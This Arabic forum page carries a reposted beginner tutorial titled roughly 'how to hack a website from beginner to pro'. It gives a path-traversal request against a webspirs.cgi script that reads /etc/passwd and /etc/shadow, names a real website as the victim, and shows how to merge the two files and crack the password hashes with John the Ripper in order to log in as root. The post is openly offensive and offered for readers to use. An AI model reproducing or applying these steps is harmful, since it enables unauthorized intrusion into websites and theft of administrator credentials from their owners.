عيون الاسلام
مرحبا بيك فى منتدى عيون الاسلام
ثمة مجتمع هنا باذخ بالعطاء مسرف بالجمال ينتظرك!
برائحة الهيل وكرم السيل .. من مجتمع لكِ إلى نصف المجتمع .. لك ..
من وهج حروفها ينبعث النور ومن جمال حضورها يولد الجيــل ..
فانضم لحزمة الضوء وبادر بالتسـ ... جيــل ..!


عيون الاسلام
مرحبا بيك فى منتدى عيون الاسلام
ثمة مجتمع هنا باذخ بالعطاء مسرف بالجمال ينتظرك!
برائحة الهيل وكرم السيل .. من مجتمع لكِ إلى نصف المجتمع .. لك ..
من وهج حروفها ينبعث النور ومن جمال حضورها يولد الجيــل ..
فانضم لحزمة الضوء وبادر بالتسـ ... جيــل ..!


عيون الاسلام
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

عيون الاسلام

ثمة مجتمع هنا باذخ بالعطاء مسرف بالجمال ينتظرك!
 
الرئيسيةعيون 2أحدث الصورالتسجيلدخولمربا بيك فى عيون الاسلام
المواضيع الأخيرة
» منتديات بحر العرب | sea-alarab.yoo7.com
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الخميس يونيو 24, 2021 11:39 pm من طرف البرق2009

» اكاديمية شبابيات الشيخ سلطان الدغيلبي للتدريب والتطوير
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الخميس يوليو 30, 2015 9:15 pm من طرف نعومة الورد

» ويندوز 2010 احدث نسخة ويندوز XP SP3 اصلية بدون تعديل
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الإثنين مايو 18, 2015 10:59 pm من طرف magdyzayed

» ادعوكم للمشاركه في افضل المنتديات الادبية ونات الحنين
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الجمعة مايو 02, 2014 7:02 pm من طرف نعومة الورد

» الدعاء في ليلة القدر مستجاب بإذن الله
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الأحد أغسطس 04, 2013 5:19 am من طرف ايمن شعبان

» أريد أن أشرف على قسم من أقسام المنتدى بمرتب شهرى
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الأحد أغسطس 04, 2013 4:37 am من طرف ايمن شعبان

» أين أعضاء المنتدى
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الخميس يوليو 25, 2013 11:59 am من طرف faouaz

» توصيات الفوركس عبر الجوال
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الجمعة يونيو 21, 2013 6:38 pm من طرف eecfc

» توصيات الأسهم السعودية عبر الجوال
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الجمعة يونيو 21, 2013 6:37 pm من طرف eecfc

» القضاء الإداري يؤجل غلق المواقع الإباحية على الإنترنت لجلسة 2 يوليو
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1السبت يونيو 01, 2013 8:01 pm من طرف عيون الاسلام

»  إثيوبيا تشكر إسرائيل والإمارات والسعودية على تمويل سد النهضة
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1السبت يونيو 01, 2013 7:49 pm من طرف عيون الاسلام

» حبس 5 من البلاك بلوك فى اشتباكات كورنيش النيل أمس
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1السبت يونيو 01, 2013 7:40 pm من طرف عيون الاسلام

» بعد إخلاء سبيلهم.. أعضاء "البلاك بلوك" و"6 أبريل" يغادرون مديرية أمن القاهرة
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1السبت يونيو 01, 2013 7:19 pm من طرف عيون الاسلام

» برنامج تعليم احكام التجويد للقران الكريم بالصوت والصوره
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الخميس مايو 23, 2013 1:48 pm من طرف ايمن شعبان

» صور السياسيين وهم صغيرين
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1السبت مايو 11, 2013 12:55 pm من طرف رانيا محمد

» نصرة ومواساة بورما وسوريا و فلسطين و افغانستان و.. واجب شرعي
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الجمعة مايو 10, 2013 7:51 pm من طرف عيون الاسلام

» السلفية الجهادية تقاطع مليونية نصرة القدس وتدعو مرسى لفتح باب الجهاد
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الخميس مايو 09, 2013 10:05 pm من طرف ايمن شعبان

» إسرائيل تعتذر رسميا لمصر عن حادث "كنيسة القيامة
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الخميس مايو 09, 2013 9:43 pm من طرف رانيا محمد

» معتز عبد الفتاح: نمتلك نخبة لو كانت فى إسرائيل لدمرتها
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الخميس مايو 09, 2013 9:26 pm من طرف رانيا محمد

» بعض الاسلاميين يشربون الشاي في مظاهرات اليوم الرافضة لعودة سياسات امن الدولة القمعية
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1الخميس مايو 09, 2013 9:00 pm من طرف ايمن شعبان

عدد زائرين المنتدى

 

نتيجة استفتاء تزايد الإضطرابات الأمنية فى المحافظات ؟

نتيجة استفتاء تزايد الإضطرابات الأمنية فى المحافظات ؟

 

معرفة الله

 

بسبب سقوط هيبة الدولة

لضعف الأداء الأمني للشرطة

لقرب موعد الإنتخابات

اعلانات عيون الاسلام
 
 
 
 
 
اشترك بالقائمة البريدية
 
Link
 
موقع الطريق الى الله
 
 
 
 
 
 
 
 
 
 
 
منتدى الدكتور احمد عامر
 

 

 كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت

اذهب الى الأسفل 
كاتب الموضوعرسالة
ayno
Admin
Admin
ayno


كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Oui-caaoni-albums-oui-caaoni-picture514-egypt-1
ذكر
عدد المساهمات : 866
تاريخ التسجيل : 24/06/2009
العمر : 44
الموقع : https://oyon.ahladalil.com
تعاليق : ارجو ان نكون اسرة واحدة

كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Empty
مُساهمةموضوع: كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت   كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Icon_minitime1السبت مارس 27, 2010 4:04 pm

كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت Besm
الدرس :

لازم تعرفون ان الاختراق مايتم الا بوجود ثغره في الموقع !!!

والثغرااات كثير ولكن اكثر الثغراااااا ت تستخدم من نظام لينوكس Linux وتكون مكتوبة بأحد اللغات بيرل او ++C وعند حصول احدنا على ثغره ,,,,,

يحتاج الى مفسر الى اللغة المكتوبه بها الثغره هذه !!!!

وهذه والحمد لله متوفر في Linux .

الان انا ما عندي Linux هذا يعني ما اقدر اخترق موقع ؟؟؟؟؟؟؟

لالالالالالالالالالالالالالالا تقدر ونص !!!!

ــــــــــــــــــــــــــــــــــــــــــــــــــ

ــــــــــــــــــــــــــــــــــــــــــــــــــ

ــــــــــــــــــــــــــــــــــــــــ

نبدأ الان بأول ثغره نقدر نستخدمها من ويندووز !!!

اسهل الثغرااات هي ثغرات CGI وهي كثيره جدا ,,,

اليوم اريد ان اشرح احد هذه الثغرات :

الملف المشكله " او الثغره " يدعى webspirs.cgi هذا الملف هو المساعد على اختراق الموقع !!!

ومنه نستطيع لقط " لطش " ملف الباسووورد !!

الثغره عباره عن اضافة نضيقها الى اسم الموقع ويتم الاختراق بها !!!

ماهي هذه الاضافه ؟؟؟؟؟؟

هي /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd


طيب هي راح تكون على الشكل التالي :

/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwdاسم الموقع اللي بتخترقه


الان انا دورت على موقع نطبق عليه الكلام هذا !!!!!!!!

الموقع الضحيه هو :

http://wilsonweb2.hwwilson.com/

كل ماعلينا هو لصق الثغره في الموقع والحصوووول على ملف الباسووورد !!!! لتصبح على الشطل التالي :

http://wilsonweb2.hwwilson.com/etc/passwd


اممممممممممممممممممممممم الموقع اخترق عن طريق الثغره هذه ممتااااااااز !!!!!

لكن الباسووورد للاسف مشفر !!!! والحل ؟؟؟؟؟

سهل ان شاء الله !!!!

نحتاج الى كود اخر لنكشف التشفير ونغير الكلمات المشفره الى كلمات واضحة ونستنتج الباسووورد للموقع !!!

الان الكلمة المشفره تكون في ملف اسمه shadow كيف نجيبة !!!

بالكود التالي :

/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/shadow

وبتطبيقه على موقعنا نحصل على :

http://wilsonweb2.hwwilson.com/etc/shadow


الان وجدنا الباسووورد المشفر نحتاج الى شوية تعديلات بسيطة لتكوين ملف وكسر التشفير واستخراج الباسوور للموقع .

ــــــــــــــــــــــــــــــــــــــــــــــــــ

ــــــــــــــــــــــــــــــــــــــــــــــــــ

ــــــــــــــــــــــــــــــــــــــــــــــــــ

ــــــــــــــــــــــــــــــ

كيف هذه التعديلات ؟؟؟؟

ملف الشادو به باسوورد الروت " مدير الموقع " root !!!

الان نعمل التالي :

الحين ملف passwd في بعد كل اسم X مثل root:X


من ملف شادو تقارن كل اكس بما يقابله من تشفير وتحطه مكانه ,,,

بالمقارنه بصورة سريعه root❌ = JTTIe4QG268fg:10643 ,,,JTTIe4QG268fg:10643 تبدلها بالاكس

ممكن يكون الملف مختلفه رموزه عندي وعندك !!!

لكن احنا نكرر العمليه على كل اكس في الملف الاول ونغيرها بما يقابلها بالملف الثاني !!

يا شباب الفقره هذه والله صعب شرحها لكن اهم شي التركيز في المكتوب !!!

طيب لما ننسخ ونلصق فين نكتب الناتج ؟؟؟

نكتب الناتج في مستند جديد وليكن الدفتر او صفحة وورد !!!

هذه بدايه بسيطة لمستند الدفتر اللي انا مسويه للبرنامج !!!

root:XOT4AiUKMRcKQ:10643
:0:1:Super-User:/:/sbin/sh daemon:NP:6445
:1:1::/: bin:NP:6445
:2:2::/usr/bin: sys:NP:6445
:3:3::/: adm:NP:6445
:4:4:Admin:/var/adm: lp:NP:6445


اكيد واضحة التغييرات فيه !!!

طيب خلاص زبطنا كل شي الان والمستند جاهز خلصنا !!!!!

لالالالالالالالالالالالالالالالالالالالالالالالالا

لالالالالالالالالالالالالالالالا


باقي نكسر التشفير الان باستخدام برنامج وين البرنامج ؟؟؟؟ وين ؟؟؟

دقيقة اخرفش في اوراقي واجيب لكم الرنامج :

اهاااا هذه وصلة تحميل الرنامج :

http://www.openwall.com/john/john-16d.zip


نزلوا البرنامج واحفظوا مستند الورد حقكم وانتظروني في الدرس القادكم


: كسر التشفيررررررررر "

وربي تعبت من الكتابه اهم شي لا احد يتفلسف ويفتح برنامج كسر الحماية عشان الواحد يبدأ خطوة خطوة !!!

نزل البرنامج وخليه على ضغطه !!!

لا تستعجل جايك بالدرس انا حبيت اعلمك خطوة خطوة ماابي اكثر عليك الدروس بعدين يتشتت ذهنك افهم الدرس وتابع معي الدرس القادم كيف تكسر التشفير !!



=-=-=-=-
نقلته حرف حرف ولا حرف طالع منه ولا منه
(KRKR)
__________________
http://www.m3gic.com/vb/attachment.php?s=&postid=47356

__________________________________________________ _______________
تكملة الدرس
=======
هذا الدرس سيكون تكملة للدرس السابق وهو اختراق المواقع !!!

اليوم سوف نتطرق إلى " أهم خطوة " في الاختراق إلا وهي كسر التشفير !!!

توصلنا في الدرس السابق إلى الكلمة السرية ولكن للأسف كانت مشفره " وهي دائما ما تكون مشفره " !!!

لذا لابد من كسر الشيفره والحصول على الكلمة السرية

خطوات كسر التشفير :

1- أولا قم بفتح الملف المضغوط الموجود على الموقع التالي :

http://www.openwall.com/john/john-16d.zip

عند فكك للضغط سوف تجد الملف المضغوط في unzipped إذا ما تعرف اتبع المسار التالي :
جهاز الكمبيوتر >>> C >>> unzipped

الآن سوف تجد المجلد التالي في unzipped وهو : john-16d

افتح المجلد سوف تجد داخله مجلد بالاسم التالي : JOHN-16

عند فتحك للمجلد سوف تجد مجلدين وهما DOC و RUN

أهم شي عندنا هو مجلد RUN

2- ألان أكيد الكل قام بعمل التغييرات في كلمة السر المشفرة ودمج الملفان مع بعضهما البعض ولم يتبقى إلا حفظ الملف باسم passwd وبدون امتداد !!!!

طيب واللي ما يعرف يحفظ بدون امتداد !!!!! وش يسوي ؟؟؟؟

يتبع الخطوات التالية :
أولا يفتح الملف أكيد أنت كتبته في الورد طيب J اعمل أولا روح إلى حفظ باسم واحفظه باسم passwd

ثم اعمل قص للملف وانسخه في مجلد الويندوز اللي موجود في C
الآن رووح وشغل الدوووووس واكتب التالي :

ren passwd.doc passwd
تأكد انك داخل مجلد ويندوز !!!! من الدوس طبعا اذا لم تكن في داخل ويندوز اكتب التالي windows
cd
ثم اكتب السطر السابق .
بعد ذلك اذهب لمجلد الويندوز وابحث عن passwd ثم اعمل لها قص وارجع إلى ملفنا القدييييييييييييييييم RUN والصقها فيه !!!!


3- الآن لم يتبقى لدينا إلا القليل " هانت يا لربع " !!!!!

افتح الدوس من جديد واكتب التالي :

إذا كنت داخل مجلد ويندوز اكتب مايلي : cd john-16\run

أما إذا كنت على السي اكتب السطرين التاليين :
cd windows ثم انتر
وبعد ذلك اكتب : cd john-16\run ثم انتر

بعد ذلك اكتب السطر التالي :
john -i passwd ثم انتر

الآن سوف يقوم الدوس بكسر الشيفره !!!!

كل ما عليك هو أن تضغط انتر كل خمس دقائق !! وتلاحظ كلمة السر !!!

وسوف تحفظ النتيجة في الملف john.pot الموجود في RNN

وعلى فكره بعض عمليات الكسر تأخذ دقا يق وبعضها ساعات

الآن لم يتبقى سوى اختراق الموقع :

تروح تخترقهم باليوزر root والباسوورد الناتجة عندك


خاتمه :

أنا كتبت هذا الموضوع بأبسط الطرق الممكنة حيث كان بمقدوري شرحه في 10 اسطر ولكن أنا اعتبرت أنني اشرح إلى ناس ليس لديهم خبره في الدوس أو كسر التشفير !!!
🇧🇩 🆎
__________________
http://www.m3gic.com/vb/attachment.php?s=&postid=47356

م ن ق و ل بس انا والله ضفت بعض الاضافات
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://oyon.ahladalil.com
 
كيف تخترق موقع من البدايه الى الاحتراف ارجو التثبيت
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
»  دعاء مكتوب على حيطان الجنة ........ ارجو التثبيت ............
» تعلم الأوفيس 2003 من الصفر حتى الاحتراف
» اتعلم صيانة جهازك من الصفر وحتى الاحتراف في يوم واحد بالصوت والصورة
» ارجو الترحيب
» الا صلاتي ما اخليها ...ارجوا التثبيت

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
عيون الاسلام :: قسم تطوير المنتديات :: ما يخص اصحاب المواقع و المنتديات-
انتقل الى: